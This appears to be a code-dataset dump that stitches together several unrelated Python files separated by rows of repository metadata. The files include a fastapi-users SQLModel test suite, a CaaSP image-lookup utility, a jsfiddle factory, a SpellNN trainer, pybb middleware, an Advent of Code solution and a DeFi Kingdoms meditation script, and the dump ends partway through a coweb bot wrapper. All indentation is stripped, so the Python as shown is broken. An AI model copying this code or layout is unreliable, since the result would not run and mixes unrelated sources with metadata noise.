safe_uuid = uuid.UUID("a9089e5d-2642-406d-a7c0-cbc641aca0ec")
async def init_sync_session(url: str) -> AsyncGenerator[Session, None]:
engine = create_engine(url, connect_args={"check_same_thread": False})
SQLModel.metadata.create_all(engine)
with Session(engine) as session:
yield session
SQLModel.metadata.drop_all(engine)
async def init_async_session(url: str) -> AsyncGenerator[AsyncSession, None]:
engine = create_async_engine(url, connect_args={"check_same_thread": False})
make_session = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False)
async with engine.begin() as conn:
await conn.run_sync(SQLModel.metadata.create_all)
async with make_session() as session:
yield session
await conn.run_sync(SQLModel.metadata.drop_all)
@pytest.fixture(
params=[
(init_sync_session, "sqlite:///./test-sqlmodel-user.db", SQLModelUserDatabase),
(
init_async_session,
"sqlite+aiosqlite:///./test-sqlmodel-user.db",
SQLModelUserDatabaseAsync,
),
],
ids=["sync", "async"],
)
async def sqlmodel_user_db(request) -> AsyncGenerator[SQLModelUserDatabase, None]:
create_session = request.param[0]
database_url = request.param[1]
database_class = request.param[2]
async for session in create_session(database_url):
yield database_class(UserDB, session)
@pytest.fixture(
params=[
(
init_sync_session,
"sqlite:///./test-sqlmodel-user-oauth.db",
SQLModelUserDatabase,
),
(
init_async_session,
"sqlite+aiosqlite:///./test-sqlmodel-user-oauth.db",
SQLModelUserDatabaseAsync,
),
],
ids=["sync", "async"],
)
async def sqlmodel_user_db_oauth(request) -> AsyncGenerator[SQLModelUserDatabase, None]:
create_session = request.param[0]
database_url = request.param[1]
database_class = request.param[2]
async for session in create_session(database_url):
yield database_class(UserDBOAuth, session, OAuthAccount)
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries(sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]):
user = UserDB(
id=safe_uuid,
email="lancelot@camelot.bt",
hashed_password="guinevere",
)
# Create
user_db = await sqlmodel_user_db.create(user)
assert user_db.id is not None
assert user_db.is_active is True
assert user_db.is_superuser is False
assert user_db.email == user.email
# Update
user_db.is_superuser = True
await sqlmodel_user_db.update(user_db)
# Get by id
id_user = await sqlmodel_user_db.get(user.id)
assert id_user is not None
assert id_user.id == user_db.id
assert id_user.is_superuser is True
# Get by email
email_user = await sqlmodel_user_db.get_by_email(str(user.email))
assert email_user is not None
assert email_user.id == user_db.id
# Get by uppercased email
email_user = await sqlmodel_user_db.get_by_email("Lancelot@camelot.bt")
assert email_user is not None
assert email_user.id == user_db.id
# Unknown user
unknown_user = await sqlmodel_user_db.get_by_email("galahad@camelot.bt")
assert unknown_user is None
# Delete user
await sqlmodel_user_db.delete(user)
deleted_user = await sqlmodel_user_db.get(user.id)
assert deleted_user is None
# Exception when trying to get by OAuth account
with pytest.raises(NotSetOAuthAccountTableError):
await sqlmodel_user_db.get_by_oauth_account("foo", "bar")
@pytest.mark.asyncio
@pytest.mark.db
async def test_insert_existing_email(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]
):
user = UserDB(
id=safe_uuid,
email="lancelot@camelot.bt",
hashed_password="guinevere",
)
await sqlmodel_user_db.create(user)
with pytest.raises(exc.IntegrityError):
await sqlmodel_user_db.create(
UserDB(id=safe_uuid, email=user.email, hashed_password="guinevere")
)
@pytest.mark.asyncio
@pytest.mark.db
async def test_insert_non_nullable_fields(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]
):
with pytest.raises(exc.IntegrityError):
wrong_user = UserDB(
id=safe_uuid, email="lancelot@camelot.bt", hashed_password="aaa"
)
wrong_user.email = None # type: ignore
await sqlmodel_user_db.create(wrong_user)
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries_custom_fields(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount],
):
"""It should output custom fields in query result."""
user = UserDB(
id=safe_uuid,
email="lancelot@camelot.bt",
hashed_password="guinevere",
first_name="Lancelot",
)
await sqlmodel_user_db.create(user)
id_user = await sqlmodel_user_db.get(user.id)
assert id_user is not None
assert id_user.id == user.id
assert id_user.first_name == user.first_name
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries_oauth(
sqlmodel_user_db_oauth: SQLModelUserDatabase[UserDBOAuth, OAuthAccount],
oauth_account1,
oauth_account2,
):
user = UserDBOAuth(
id=safe_uuid,
email="lancelot@camelot.bt",
hashed_password="guinevere",
oauth_accounts=[oauth_account1, oauth_account2],
)
# Create
user_db = await sqlmodel_user_db_oauth.create(user)
assert user_db.id is not None
assert hasattr(user_db, "oauth_accounts")
assert len(user_db.oauth_accounts) == 2
# Update
user_db.oauth_accounts[0].access_token = "NEW_TOKEN"
await sqlmodel_user_db_oauth.update(user_db)
# Get by id
id_user = await sqlmodel_user_db_oauth.get(user.id)
assert id_user is not None
assert id_user.id == user_db.id
assert id_user.oauth_accounts[0].access_token == "NEW_TOKEN"
# Get by email
email_user = await sqlmodel_user_db_oauth.get_by_email(str(user.email))
assert email_user is not None
assert email_user.id == user_db.id
assert len(email_user.oauth_accounts) == 2
# Get by OAuth account
oauth_user = await sqlmodel_user_db_oauth.get_by_oauth_account(
oauth_account1.oauth_name, oauth_account1.account_id
)
assert oauth_user is not None
assert oauth_user.id == user.id
assert len(oauth_user.oauth_accounts) == 2
# Unknown OAuth account
unknown_oauth_user = await sqlmodel_user_db_oauth.get_by_oauth_account("foo", "bar")
assert unknown_oauth_user is None
| 30.982456
| 88
| 0.709513
| 920
| 7,064
| 5.191304
| 0.147826
| 0.059045
| 0.085008
| 0.079564
| 0.630653
| 0.573283
| 0.536432
| 0.484296
| 0.45959
| 0.44263
| 0
| 0.006196
| 0.200311
| 7,064
| 227
| 89
| 31.118943
| 0.839264
| 0.03171
| 0
| 0.445714
| 0
| 0
| 0.071481
| 0.029538
| 0
| 0
| 0
| 0
| 0.165714
| 1
| 0
| false
| 0.034286
| 0.051429
| 0
| 0.051429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c64a40785307d838c76dd7877d9296fa9590e81
| 623
|
py
|
Python
|
copy_reg.py
|
rtbo/vkdgen
|
04a228961bb091b59dc6f741eee703cd81724ca3
|
[
"MIT"
] | 2
|
2021-01-08T15:05:27.000Z
|
2021-10-12T08:44:01.000Z
|
copy_reg.py
|
rtbo/vkdgen
|
04a228961bb091b59dc6f741eee703cd81724ca3
|
[
"MIT"
] | null | null | null |
copy_reg.py
|
rtbo/vkdgen
|
04a228961bb091b59dc6f741eee703cd81724ca3
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
import os
from os import path
root_dir = path.dirname(path.realpath(__file__))
local_reg_dir = path.join(root_dir, 'registry')
os.makedirs(local_reg_dir, exist_ok=True)
def copy_reg(reg_dir, files):
import shutil
for f in files:
file_path = path.join(reg_dir, f)
if not path.isfile(file_path):
raise RuntimeError(file_path + ' could not be found')
shutil.copy2(file_path, path.join(local_reg_dir, path.basename(f)))
vk_files = [ 'registry/vk.xml', 'registry/reg.py', 'registry/generator.py' ]
copy_reg(path.join(root_dir, 'Vulkan-Headers'), vk_files)
| 31.15
| 76
| 0.704655
| 99
| 623
| 4.191919
| 0.444444
| 0.072289
| 0.079518
| 0.072289
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003846
| 0.165329
| 623
| 19
| 77
| 32.789474
| 0.794231
| 0.035313
| 0
| 0
| 0
| 0
| 0.153333
| 0.035
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.214286
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c656802f3785c807e752895a2d07dd94b79c82b
| 4,377
|
py
|
Python
|
cloud/caasp-admin-setup/lib/caaspadminsetup/utils.py
|
hwoarang/caasp-container-manifests
|
6df831d6b4f4218f96e552c416d86eabcfad46c0
|
[
"Apache-2.0"
] | 5
|
2017-03-16T10:47:39.000Z
|
2018-01-17T13:07:03.000Z
|
cloud/caasp-admin-setup/lib/caaspadminsetup/utils.py
|
hwoarang/caasp-container-manifests
|
6df831d6b4f4218f96e552c416d86eabcfad46c0
|
[
"Apache-2.0"
] | 138
|
2017-03-08T12:43:51.000Z
|
2019-04-15T12:57:30.000Z
|
cloud/caasp-admin-setup/lib/caaspadminsetup/utils.py
|
hwoarang/caasp-container-manifests
|
6df831d6b4f4218f96e552c416d86eabcfad46c0
|
[
"Apache-2.0"
] | 26
|
2017-03-09T08:24:03.000Z
|
2019-03-08T00:26:52.000Z
|
import json
import logging
import re
import susepubliccloudinfoclient.infoserverrequests as ifsrequest
import yaml
import sys
RELEASE_DATE = re.compile('^.*-v(\d{8})-*.*')
def get_caasp_release_version():
"""Return the version from os-release"""
os_release = open('/etc/os-release', 'r').readlines()
for entry in os_release:
if entry.startswith('VERSION_ID'):
version_id = entry.split('=')[-1].strip()
# We assume that os-release will always have '"' as
# version delimiters
version = version_id.strip('"\'')
logging.info('Release version: "%s"' % version)
return version
def get_cloud_config_path():
"""Return the path for the cloud configuration file"""
return '/etc/salt/pillar/cloud.sls'
def get_from_config(config_option):
"""Get the value for the given config option"""
# Expected low usage of this method, re-read the file on an as needed
# basis. If this turns out to be an issue cache the content
config_path = get_cloud_config_path()
with open(config_path) as config_file:
config = yaml.load(config_file.read())
settings = config.get('cloud')
if not settings:
return
return settings.get(config_option)
def get_cluster_image_identifier(framework, region):
"""Return the identifier for the latest cluster node image"""
cluster_image = get_from_config('cluster_image')
if cluster_image:
# The data returned in this code path has built in knowledge
# about the information consumed by the client from the
# full pint data
image_data = {}
image_data['id'] = cluster_image
image_data['name'] = cluster_image
if framework == 'microsoft' and cluster_image.count(':') == 3:
image_data['urn'] = cluster_image
msg = 'Using cluster image from configuration. '
msg += 'Image data for cluster node image: "%s"'
logging.info(msg % image_data)
return image_data
name_filter = 'name~caasp,name~cluster'
flavor = get_from_config('procurement_flavor')
if flavor == 'byos':
name_filter += ',name~byos'
else:
name_filter += ',name!byos'
version = get_caasp_release_version()
name_filter += ',name~' + version.replace('.', '-')
# The cluster image we choose depends on the admin node version,
# thus we cannot just query for active images. We need to get all
# images and then process accordingly.
try:
image_info = ifsrequest.get_image_data(
framework,
None,
'json',
region,
name_filter
)
except Exception as e:
logging.error('Pint server access failed: "%s"' % e.message)
# This message will bubble up through salt
return 'See /var/log/caasp_cloud_setup.log'
try:
image_data = json.loads(image_info)
available_images = image_data.get('images', [])
target_image = None
target_image_date = 0
for image in available_images:
image_name = image.get('name')
try:
date = int(RELEASE_DATE.match(image_name).group(1))
if date > target_image_date:
# If we have multiple images with the same date that
# match our filter criteria we have a serious data problem
# we cannot really recover, the first one wins
target_image = image
except Exception:
# Image name with no date stamp skip it
continue
except Exception as e:
logging.error('Could not load json data from pint: "%s"' % e.message)
# This message will bubble up through salt
return 'See /var/log/caasp_cloud_setup.log'
if not target_image:
logging.error('Could not determine image identifier for cluster node.')
logging.error('This implies that the pint server is unreachable or the '
'data is incomplete, please report the issue, exiting.')
sys.exit('pint lookup failed')
logging.info('Image data for cluster node image: "%s"' % target_image)
return target_image
def load_platform_module(platform_name):
mod = __import__('caaspadminsetup.%s' % platform_name, fromlist=[''])
return mod
| 37.732759
| 80
| 0.631026
| 557
| 4,377
| 4.807899
| 0.332136
| 0.036968
| 0.020911
| 0.01643
| 0.100822
| 0.100822
| 0.078417
| 0.056759
| 0.056759
| 0.056759
| 0
| 0.00158
| 0.276902
| 4,377
| 115
| 81
| 38.06087
| 0.84455
| 0.215216
| 0
| 0.085366
| 0
| 0
| 0.197705
| 0.032068
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060976
| false
| 0
| 0.085366
| 0
| 0.243902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c6cd0ca287f397e656cbb934079a5d03bb867b9
| 2,786
|
py
|
Python
|
jsfiddle_factory/__init__.py
|
andrewp-as-is/jsfiddle-factory.py
|
7b8b883676f3330f5714b15157819b583a753ba1
|
[
"Unlicense"
] | null | null | null |
jsfiddle_factory/__init__.py
|
andrewp-as-is/jsfiddle-factory.py
|
7b8b883676f3330f5714b15157819b583a753ba1
|
[
"Unlicense"
] | null | null | null |
jsfiddle_factory/__init__.py
|
andrewp-as-is/jsfiddle-factory.py
|
7b8b883676f3330f5714b15157819b583a753ba1
|
[
"Unlicense"
] | null | null | null |
__all__ = ['Factory']
import jsfiddle_build
import jsfiddle_github
import jsfiddle_generator
import jsfiddle_readme_generator
import getdirs
import getfiles
import os
import popd
import yaml
@popd.popd
def _build(path):
os.chdir(path)
jsfiddle_build.Build().save("build.html")
@popd.popd
def _init(path):
os.chdir(path)
isempty = len(os.listdir(path)) == 0
isfiddle = len(
list(filter(os.path.exists, ["demo.css", "demo.js", "demo.html"]))) > 0
if isempty or isfiddle:
jsfiddle_generator.JSFiddleRepo().create()
@popd.popd
def _readme(path):
os.chdir(path)
jsfiddle_readme_generator.Readme().save("README.md")
class Factory:
"""attrs: `path`. methods: `detox()`, `init()`, `build()`, `readme()`, `update_resources()`"""
path = None
def __init__(self, path=None):
if not path:
path = os.getcwd()
self.path = path
def build_html(self):
files = getfiles.getfiles(self.path)
matches = ["demo.html", "fiddle.html"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
_build(os.path.dirname(f))
def create_readme(self):
files = getfiles.getfiles(self.path)
matches = ["demo.html", "fiddle.html"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
_readme(os.path.dirname(f))
def init(self):
for path in getdirs.getdirs(self.path):
_init(path)
def detox(self):
renamed = True
while renamed:
renamed = False
for path in getdirs.getdirs(self.path):
relpath = os.path.relpath(path, os.getcwd())
new_relpath = jsfiddle_github.sanitize(relpath)
new_path = os.path.join(os.getcwd(), new_relpath)
ishidden = relpath[0] == "." and "%s." % os.sep not in relpath
if not ishidden and new_relpath != relpath:
os.rename(path, new_path)
print("%s -> %s" % (path, new_path))
renamed = True
break
def update_resources(self):
f = os.path.join(self.path, "resources.txt")
if not os.path.exists(f):
print("SKIP: %s NOT EXISTS" % f)
resources = list(filter(None, open(f).read().splitlines()))
files = getfiles.getfiles(self.path)
matches = ["demo.details", "fiddle.manifest"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
if os.path.exists(f):
data = yaml.load(open(f, 'r'))
if data.get("resources", []) != resources:
data["resources"] = resources
yaml.dump(data, open(f, 'w'), default_flow_style=False)
| 30.955556
| 98
| 0.578248
| 346
| 2,786
| 4.552023
| 0.245665
| 0.041905
| 0.017778
| 0.028571
| 0.280635
| 0.229841
| 0.229841
| 0.165079
| 0.165079
| 0.165079
| 0
| 0.001505
| 0.284637
| 2,786
| 89
| 99
| 31.303371
| 0.788761
| 0.031587
| 0
| 0.25
| 0
| 0
| 0.067236
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.125
| 0
| 0.277778
| 0.027778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c6d7d5083c40236ec67c12d5db46eb9b81e4185
| 5,774
|
py
|
Python
|
spellnn/train.py
|
MartinXPN/SpellNN
|
e3226fbff359ef60360e63bf7b80a7e1c909e7d8
|
[
"MIT"
] | null | null | null |
spellnn/train.py
|
MartinXPN/SpellNN
|
e3226fbff359ef60360e63bf7b80a7e1c909e7d8
|
[
"MIT"
] | null | null | null |
spellnn/train.py
|
MartinXPN/SpellNN
|
e3226fbff359ef60360e63bf7b80a7e1c909e7d8
|
[
"MIT"
] | null | null | null |
import logging
import os
from datetime import datetime
from inspect import signature, Parameter
from pathlib import Path
from pprint import pprint
from textwrap import dedent
from typing import Optional, Union
import fire
import tensorflow as tf
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard, TerminateOnNaN
from tensorflow.keras import Model
from spellnn import models
from spellnn.data import alphabet
from spellnn.data.alphabet import get_chars
from spellnn.data.processing import DataProcessor
from spellnn.data.util import nb_lines
from spellnn.layers.mapping import CharMapping
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # FATAL
logging.getLogger('tensorflow').setLevel(logging.FATAL)
class Gym:
def __init__(self):
self.train_dataset: Optional[tf.data.Dataset] = None
self.valid_dataset: Optional[tf.data.Dataset] = None
self.char2int: Optional[CharMapping] = None
self.model: Optional[Model] = None
self.nb_train_samples: int = 0
self.nb_valid_samples: int = 0
self.batch_size = 0
def construct_dataset(self, path: str, locale: str, batch_size: int = 32, validation_split: float = 0.3):
pprint(locals())
all_chars = [alphabet.START, alphabet.END] + get_chars(locale)
char_weights = [0.5 if c.isalpha() and c.islower() else
0.2 if c.isalpha() else
0.1 if c not in {alphabet.START, alphabet.END} else
0 for c in all_chars]
self.char2int = CharMapping(chars=all_chars, include_unknown=True)
data_processor = DataProcessor(locale=locale, char2id=self.char2int,
alphabet=all_chars, alphabet_weighs=char_weights)
print('Calculating number of lines in the file...', end=' ')
all_samples = nb_lines(path)
print(all_samples)
self.batch_size = batch_size
self.nb_train_samples = int((1 - validation_split) * all_samples)
self.nb_valid_samples = all_samples - self.nb_train_samples
dataset = tf.data.TextLineDataset(path)
self.train_dataset = dataset.take(self.nb_train_samples)
self.train_dataset = self.train_dataset.shuffle(10 * batch_size, seed=42, reshuffle_each_iteration=True)
self.train_dataset = self.train_dataset.batch(batch_size, drop_remainder=True)
self.train_dataset = self.train_dataset.map(
lambda b: tf.numpy_function(func=data_processor.process_batch, inp=[b], Tout=['int32', 'int32', 'int32']))
self.train_dataset = self.train_dataset.map(lambda enc_in, dec_in, targ: ((enc_in, dec_in), targ))
self.train_dataset = self.train_dataset.repeat()
self.valid_dataset = dataset.skip(self.nb_train_samples)
self.valid_dataset = self.valid_dataset.shuffle(10 * batch_size, seed=42, reshuffle_each_iteration=True)
self.valid_dataset = self.valid_dataset.batch(batch_size, drop_remainder=True)
self.valid_dataset = self.valid_dataset.map(
lambda b: tf.numpy_function(func=data_processor.process_batch, inp=[b], Tout=['int32', 'int32', 'int32']))
self.valid_dataset = self.valid_dataset.map(lambda enc_in, dec_in, targ: ((enc_in, dec_in), targ))
self.valid_dataset = self.valid_dataset.repeat()
return self
def create_model(self, name):
arguments = signature(getattr(models, name).__init__)
arguments = {k: v.default for k, v in arguments.parameters.items()
if v.default is not Parameter.empty and k != 'self'}
arguments['nb_symbols'] = len(self.char2int)
arg_str = ', '.join([f'{k}=' + str(v) if type(v) != str else f'{k}=' '"' + str(v) + '"'
for k, v in arguments.items()])
# print(arg_str)
exec(dedent(f'''
def create({arg_str}):
self.model = {name}(**locals())
return self
create.__name__ = {name}.__name__
create.__doc__ = {name}.__init__.__doc__
setattr(self, create.__name__, create)
'''), {'self': self, name: getattr(models, name), arg_str: arg_str})
return getattr(self, name)
def train(self, epochs: int, monitor_metric='val_acc', patience: int = 5,
steps_per_epoch: Union[int, str] = 'auto', validation_steps: Union[int, str] = 'auto',
log_dir: str = 'logs',
use_multiprocessing: bool = False):
pprint(locals())
log_dir = Path(log_dir).joinpath(datetime.now().replace(microsecond=0).isoformat())
model_path = Path(log_dir).joinpath('checkpoints').joinpath('best-model.h5py')
model_path = str(model_path)
if steps_per_epoch == 'auto':
steps_per_epoch = self.nb_train_samples // self.batch_size
if validation_steps == 'auto':
validation_steps = self.nb_valid_samples // self.batch_size
self.model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['acc'])
history = self.model.fit_generator(
self.train_dataset.as_numpy_iterator(), steps_per_epoch=steps_per_epoch,
validation_data=self.valid_dataset.as_numpy_iterator(), validation_steps=validation_steps,
epochs=epochs,
use_multiprocessing=use_multiprocessing, workers=os.cpu_count() - 1,
callbacks=[
TerminateOnNaN(),
TensorBoard(log_dir=log_dir),
ModelCheckpoint(model_path, monitor=monitor_metric, verbose=1, save_best_only=True),
EarlyStopping(monitor=monitor_metric, patience=patience),
])
return history.history
if __name__ == '__main__':
cli = Gym()
fire.Fire(cli)
| 46.943089
| 118
| 0.662799
| 734
| 5,774
| 4.957766
| 0.262943
| 0.032152
| 0.057159
| 0.029678
| 0.251168
| 0.214894
| 0.185765
| 0.154438
| 0.108272
| 0.108272
| 0
| 0.010316
| 0.227745
| 5,774
| 122
| 119
| 47.327869
| 0.805786
| 0.003464
| 0
| 0.057143
| 0
| 0
| 0.08329
| 0.00939
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038095
| false
| 0
| 0.171429
| 0
| 0.257143
| 0.047619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c72d8c0b48b4984dfd1c6e64ae6bd05f864f9ea
| 1,273
|
py
|
Python
|
pybb/middleware.py
|
grigi/pybbm
|
9ecc5e7fadf4da820d2fc2c22914e14f3545047d
|
[
"BSD-2-Clause"
] | null | null | null |
pybb/middleware.py
|
grigi/pybbm
|
9ecc5e7fadf4da820d2fc2c22914e14f3545047d
|
[
"BSD-2-Clause"
] | null | null | null |
pybb/middleware.py
|
grigi/pybbm
|
9ecc5e7fadf4da820d2fc2c22914e14f3545047d
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from django.utils import translation
from django.db.models import ObjectDoesNotExist
from pybb import util
from pybb.signals import user_saved
class PybbMiddleware(object):
def process_request(self, request):
if request.user.is_authenticated():
try:
# Here we try to load profile, but can get error
# if user created during syncdb but profile model
# under south control. (Like pybb.Profile).
profile = util.get_pybb_profile(request.user)
except ObjectDoesNotExist:
# Ok, we should create new profile for this user
# and grant permissions for add posts
user_saved(request.user, created=True)
profile = util.get_pybb_profile(request.user)
language = translation.get_language_from_request(request)
if not profile.language:
profile.language = language
profile.save()
if profile.language and profile.language != language:
request.session['django_language'] = profile.language
translation.activate(profile.language)
request.LANGUAGE_CODE = translation.get_language()
| 37.441176
| 69
| 0.624509
| 138
| 1,273
| 5.65942
| 0.456522
| 0.115237
| 0.035851
| 0.046095
| 0.09219
| 0.09219
| 0.09219
| 0
| 0
| 0
| 0
| 0.001135
| 0.307934
| 1,273
| 33
| 70
| 38.575758
| 0.885358
| 0.189317
| 0
| 0.1
| 0
| 0
| 0.014634
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.2
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c73a2fb986309ca0a2f6912149adaf74509a6fc
| 716
|
py
|
Python
|
day5.py
|
achien/advent-of-code-2021
|
8851e1727975ea8124db78b54fe577fbf2e5883d
|
[
"MIT"
] | null | null | null |
day5.py
|
achien/advent-of-code-2021
|
8851e1727975ea8124db78b54fe577fbf2e5883d
|
[
"MIT"
] | null | null | null |
day5.py
|
achien/advent-of-code-2021
|
8851e1727975ea8124db78b54fe577fbf2e5883d
|
[
"MIT"
] | null | null | null |
import fileinput
counts = {}
for line in fileinput.input():
line = line.strip()
p1, p2 = line.split('>')
p1 = p1[:-2]
x1, y1 = p1.split(',')
x1 = int(x1)
y1 = int(y1)
p2 = p2[1:]
x2, y2 = p2.split(',')
x2 = int(x2)
y2 = int(y2)
if x1 == x2:
dx = 0
elif x1 > x2:
dx = -1
else:
dx = 1
if y1 == y2:
dy = 0
elif y1 > y2:
dy = -1
else:
dy = 1
x = x1
y = y1
while True:
pt = (x, y)
counts[pt] = counts.get(pt, 0) + 1
if x == x2 and y == y2:
break
x += dx
y += dy
n = 0
for _, ct in counts.items():
if ct > 1:
n += 1
print(n)
| 15.911111
| 42
| 0.391061
| 108
| 716
| 2.583333
| 0.333333
| 0.028674
| 0.043011
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114796
| 0.452514
| 716
| 45
| 43
| 15.911111
| 0.596939
| 0
| 0
| 0.051282
| 0
| 0
| 0.004184
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.025641
| 0
| 0.025641
| 0.025641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c73c6bd43cad4b6997238ea62e6e2c529f20e54
| 1,635
|
py
|
Python
|
meditation_example.py
|
sodapopinsky/dfk
|
be48e89d4b054ad8abbb009d0e1ea4c10f559af5
|
[
"MIT"
] | 90
|
2021-10-17T19:36:45.000Z
|
2022-03-31T17:19:43.000Z
|
meditation_example.py
|
sodapopinsky/dfk
|
be48e89d4b054ad8abbb009d0e1ea4c10f559af5
|
[
"MIT"
] | 13
|
2021-11-13T00:19:31.000Z
|
2022-03-20T15:13:22.000Z
|
meditation_example.py
|
sodapopinsky/dfk
|
be48e89d4b054ad8abbb009d0e1ea4c10f559af5
|
[
"MIT"
] | 71
|
2021-11-05T03:00:41.000Z
|
2022-03-30T06:16:25.000Z
|
import logging
from web3 import Web3
import sys
import time
import meditation.meditation as meditation
if __name__ == "__main__":
log_format = '%(asctime)s|%(name)s|%(levelname)s: %(message)s'
logger = logging.getLogger("DFK-meditation")
logger.setLevel(logging.DEBUG)
logging.basicConfig(level=logging.INFO, format=log_format, stream=sys.stdout)
rpc_server = 'https://api.harmony.one'
logger.info("Using RPC server " + rpc_server)
private_key = None # set private key
account_address = '0x2E7669F61eA77F02445A015FBdcFe2DE47083E02'
gas_price_gwei = 10
tx_timeout_seconds = 30
w3 = Web3(Web3.HTTPProvider(rpc_server))
active_meditations = meditation.get_active_meditations(account_address, rpc_server)
logger.info("Pending meditation on address " + str(account_address) + ": "+str(active_meditations))
level = 1
hero_id = 1
required_runes = meditation.get_required_runes(level, rpc_server)
meditation.start_meditation(1, meditation.stat2id('strength'), meditation.stat2id('endurance'), meditation.stat2id('luck'),
meditation.ZERO_ADDRESS, private_key, w3.eth.getTransactionCount(account_address),
gas_price_gwei, tx_timeout_seconds, rpc_server, logger)
hero_meditation = meditation.get_hero_meditation(hero_id, rpc_server)
logger.info("Pending meditation "+str(hero_meditation))
time.sleep(5)
meditation.complete_meditation(hero_id, private_key, w3.eth.getTransactionCount(account_address),
gas_price_gwei, tx_timeout_seconds, rpc_server, logger)
| 41.923077
| 127
| 0.720489
| 193
| 1,635
| 5.818653
| 0.378238
| 0.072128
| 0.053428
| 0.033838
| 0.22618
| 0.22618
| 0.162066
| 0.162066
| 0.162066
| 0.162066
| 0
| 0.03286
| 0.18104
| 1,635
| 38
| 128
| 43.026316
| 0.805825
| 0.009174
| 0
| 0.066667
| 0
| 0
| 0.13791
| 0.047619
| 0
| 0
| 0.025974
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c76367fcd11568b786d20b9e43e17b970ff6e48
| 2,329
|
py
|
Python
|
servers/python/coweb/bot/wrapper/object.py
|
opencoweb/coweb
|
7b3a87ee9eda735a859447d404ee16edde1c5671
|
[
"AFL-2.1"
] | 83
|
2015-01-05T19:02:57.000Z
|
2021-11-19T02:48:09.000Z
|
servers/python/coweb/bot/wrapper/object.py
|
xuelingxiao/coweb
|
7b3a87ee9eda735a859447d404ee16edde1c5671
|
[
"AFL-2.1"
] | 3
|
2015-12-16T13:49:33.000Z
|
2019-06-17T13:38:50.000Z
|
servers/python/coweb/bot/wrapper/object.py
|
xuelingxiao/coweb
|
7b3a87ee9eda735a859447d404ee16edde1c5671
|
[
"AFL-2.1"
] | 14
|
2015-04-29T22:36:53.000Z
|
2021-11-18T03:24:29.000Z
|
'''
Copyright (c) The Dojo Foundation 2011. All Rights Reserved.
Copyright (c) IBM Corporation 2008, 2011. All Rights Reserved.
'''
# tornado
import tornado.ioloop
# std lib
import logging
import time
import weakref
import functools
# coweb
from .base import BotWrapperBase
log = logging.getLogger('coweb.bot')
class ObjectBotWrapper(BotWrapperBase):
def __init__(self, manager, botClass, serviceName, serviceToken, appData):
self.serviceName = serviceName
self.appData = appData
self._serviceToken = serviceToken
